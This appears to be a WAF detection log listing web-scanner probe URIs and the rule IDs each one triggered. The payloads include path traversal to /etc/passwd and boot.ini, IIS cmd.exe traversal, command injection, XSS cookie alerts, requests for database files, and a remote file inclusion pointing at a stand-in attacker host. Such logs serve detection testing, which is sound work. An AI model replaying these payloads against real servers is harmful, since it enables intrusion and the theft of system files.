Packet [1658]	Uri [/forum-ra_professionnel.asp?n=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [1659]	Uri [/forum-ra_professionnel.asp?n=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1660]	Uri [/forum-ra_professionnel.asp?n=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [1661]	Uri [/forum-ra_professionnel.asp?n=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [1663]	Uri [/forum/admin/database/wwForum.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1664]	Uri [/forum/admin/database/wwFSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1665]	Uri [/forum/admin/wwforum.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1666]	Uri [/forum/admin/wwfSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1677]	Uri [/forum1.asp?n=%60/etc/passwd%60&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [1679]	Uri [/forum1.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1680]	Uri [/forum1.asp?n=../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1681]	Uri [/forum1.asp?n=/....../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1682]	Uri [/forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1683]	Uri [/forum1.asp?n=/../../../../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1684]	Uri [/forum1.asp?n=/../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1685]	Uri [/forum1.asp?n=/.\./.\./.\./.\./.\./boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [1686]	Uri [/forum1.asp?n=/etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [1687]	Uri [/forum1.asp?n=/etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1688]	Uri [/forum1.asp?n=1753&amp;nn=%60/etc/passwd%60]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [1690]	Uri [/forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1691]	Uri [/forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1692]	Uri [/forum1.asp?n=1753&amp;nn=/....../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1693]	Uri [/forum1.asp?n=1753&amp;nn=/..../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1694]	Uri [/forum1.asp?n=1753&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1695]	Uri [/forum1.asp?n=1753&amp;nn=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [1696]	Uri [/forum1.asp?n=1753&amp;nn=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1697]	Uri [/forum1.asp?n=1753&amp;nn=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [1698]	Uri [/forum1.asp?n=1753&amp;nn=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [1699]	Uri [/forum1.asp?n=c:\boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [1 ]	Signatures	[930120]
Packet [1700]	Uri [/forum1_professionnel.asp?n=%60/etc/passwd%60&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [1702]	Uri [/forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1703]	Uri [/forum1_professionnel.asp?n=/....../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1704]	Uri [/forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1705]	Uri [/forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1706]	Uri [/forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1707]	Uri [/forum1_professionnel.asp?n=/.\./.\./.\./.\./.\./boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [1708]	Uri [/forum1_professionnel.asp?n=/etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [1709]	Uri [/forum1_professionnel.asp?n=/etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1710]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=%60/etc/passwd%60&amp;page=1]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [1712]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=../../../../../../../../../etc/passwd%00&amp;page=1]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1713]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/....../boot.ini&amp;page=1]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1714]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;page=1]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1715]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../etc/passwd&amp;page=1]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1716]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/.\./.\./.\./.\./.\./boot.ini&amp;page=1]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [1717]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd%00&amp;page=1]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [1718]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd&amp;page=1]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1719]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=%60/etc/passwd%60]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [1721]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1722]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/....../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1723]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/..../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1724]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.../.../.../.../.../.../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1725]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1726]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1727]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [1728]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1729]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [1730]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [1731]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=c:\boot.ini&amp;page=1]	Nattacks [1 ]	Signatures	[930120]
Packet [1732]	Uri [/forum1_professionnel.asp?n=c:\boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [1 ]	Signatures	[930120]
Packet [1733]	Uri [/forumdisplay.php?GLOBALS[]=1&f=2&comma=\.system('id').\]	Nattacks [3 ]	Signatures	[933160]	[942460]	[942511]
Packet [1737]	Uri [/forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;]	Nattacks [1 ]	Signatures	[941180]
Packet [1738]	Uri [/forums/indSensePostNotThereNoNo.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;]	Nattacks [1 ]	Signatures	[941180]
Packet [1739]	Uri [/forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [1740]	Uri [/forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [1742]	Uri [/forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22]	Nattacks [5 ]	Signatures	[932100]	[942110]	[942430]	[942431]	[942511]
Packet [1747]	Uri [/fpdb/shop.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1748]	Uri [/fpdb/shoSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1762]	Uri [/global.asa]	Nattacks [1 ]	Signatures	[920440]
Packet [1763]	Uri [/global.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [1775]	Uri [/guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E]	Nattacks [7 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]	[942460]
Packet [1777]	Uri [/guestbook/admin/o12guest.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1778]	Uri [/guestbook/admin/o12SensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1785]	Uri [/guestbook/SensePostNotThereNoNo?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E]	Nattacks [7 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]	[942460]
Packet [1840]	Uri [/homebet/homebet.dll?form=menu&amp;option=menu-signin]	Nattacks [1 ]	Signatures	[920440]
Packet [1841]	Uri [/homebet/homSensePostNotThereNoNo.dll?form=menu&amp;option=menu-signin]	Nattacks [1 ]	Signatures	[920440]
Packet [1847]	Uri [/hostadmin/?page=']	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [1852]	Uri [/htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [1857]	Uri [/ht_root/wwwroot/-/local/httpd$map.conf]	Nattacks [1 ]	Signatures	[920440]
Packet [1859]	Uri [/HyperStat/staSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1860]	Uri [/hyperstat/staSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1861]	Uri [/HyperStat/stat_what.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1862]	Uri [/hyperstat/stat_what.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1873]	Uri [/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1874]	Uri [/iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1875]	Uri [/iisadmpwd/aexp2.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1876]	Uri [/iisadmpwd/aexp2b.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1877]	Uri [/iisadmpwd/aexp3.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1878]	Uri [/iisadmpwd/aexp4.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1879]	Uri [/iisadmpwd/aexp4b.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1880]	Uri [/iisadmpwd/aexSensePostNotThereNoNo.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1891]	Uri [/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1894]	Uri [/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1897]	Uri [/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1899]	Uri [/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full]	Nattacks [1 ]	Signatures	[920440]
Packet [1900]	Uri [/iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full]	Nattacks [1 ]	Signatures	[920440]
Packet [1901]	Uri [/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1907]	Uri [/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1908]	Uri [/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1910]	Uri [/iissamples/sdk/asp/docs/CodSensePostNotThereNoNo.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1912]	Uri [/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1913]	Uri [/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1915]	Uri [/iissamples/sdk/asp/docs/WinSensePostNotThereNoNo.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1921]	Uri [/images/?pattern=/etc/*&sort=name]	Nattacks [2 ]	Signatures	[932190]	[942440]
Packet [1936]	Uri [/inc/sendmail.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [1950]	Uri [/index.html.bak]	Nattacks [1 ]	Signatures	[920440]
Packet [1983]	Uri [/index.html~]	Nattacks [1 ]	Signatures	[920500]
Packet [1984]	Uri [/index.jsp%00x]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [1991]	Uri [/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [1992]	Uri [/index.php?download=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1997]	Uri [/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1998]	Uri [/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [1999]	Uri [/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [2001]	Uri [/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [2002]	Uri [/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [2003]	Uri [/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [2004]	Uri [/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [2005]	Uri [/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [2006]	Uri [/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [2007]	Uri [/index.php?page=../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [2008]	Uri [/index.php?page=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2013]	Uri [/index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20]	Nattacks [1 ]	Signatures	[941180]
Packet [2014]	Uri [/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;]	Nattacks [1 ]	Signatures	[941180]
Packet [2015]	Uri [/index.php?|=../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2040]	Uri [/internal.sws?../../winnt/win.ini]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2044]	Uri [/interscan/cgi-bin/FtpSave.dll?I'm%20Here]	Nattacks [1 ]	Signatures	[920440]
Packet [2055]	Uri [/isapi/tstisapi.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2076]	Uri [/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [2077]	Uri [/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2078]	Uri [/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [2079]	Uri [/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2083]	Uri [/k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2099]	Uri [/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [2307]	Uri [/local/httpd$map.conf]	Nattacks [1 ]	Signatures	[920440]
Packet [2316]	Uri [/logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|]	Nattacks [13 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2326]	Uri [/logicworks.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [2331]	Uri [/LOGIN.PWD]	Nattacks [1 ]	Signatures	[920440]
Packet [2342]	Uri [/logs/strSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2343]	Uri [/logs/str_err.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2370]	Uri [/mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;]	Nattacks [1 ]	Signatures	[942511]
Packet [2371]	Uri [/mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd]	Nattacks [8 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932115]	[932160]	[942460]
Packet [2374]	Uri [/mall_log_files/order.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2375]	Uri [/mall_log_files/ordSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2386]	Uri [/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F]	Nattacks [2 ]	Signatures	[931120]	[931130]
Packet [2387]	Uri [/mantis/sumSensePostNotThereNoNo.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F]	Nattacks [2 ]	Signatures	[931120]	[931130]
Packet [2401]	Uri [/mcartfree/database/metacart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [2402]	Uri [/mcartfree/database/metSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [2403]	Uri [/megabook/files/20/setSensePostNotThereNoNop.db]	Nattacks [1 ]	Signatures	[920440]
Packet [2404]	Uri [/megabook/files/20/setup.db]	Nattacks [1 ]	Signatures	[920440]
Packet [2407]	Uri [/members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22]	Nattacks [5 ]	Signatures	[932100]	[942110]	[942430]	[942431]	[942511]
Packet [2415]	Uri [/metacart/database/metacart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [2416]	Uri [/metacart/database/metSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [2417]	Uri [/midicart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [2418]	Uri [/MIDICART/midicart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [2419]	Uri [/MIDICART/midSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [2434]	Uri [/modif_infos.asp?n=%60/etc/passwd%60]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [2436]	Uri [/modif_infos.asp?n=../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2437]	Uri [/modif_infos.asp?n=/....../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [2438]	Uri [/modif_infos.asp?n=/.../.../.../.../.../.../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [2439]	Uri [/modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [2440]	Uri [/modif_infos.asp?n=/../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2441]	Uri [/modif_infos.asp?n=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [2442]	Uri [/modif_infos.asp?n=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
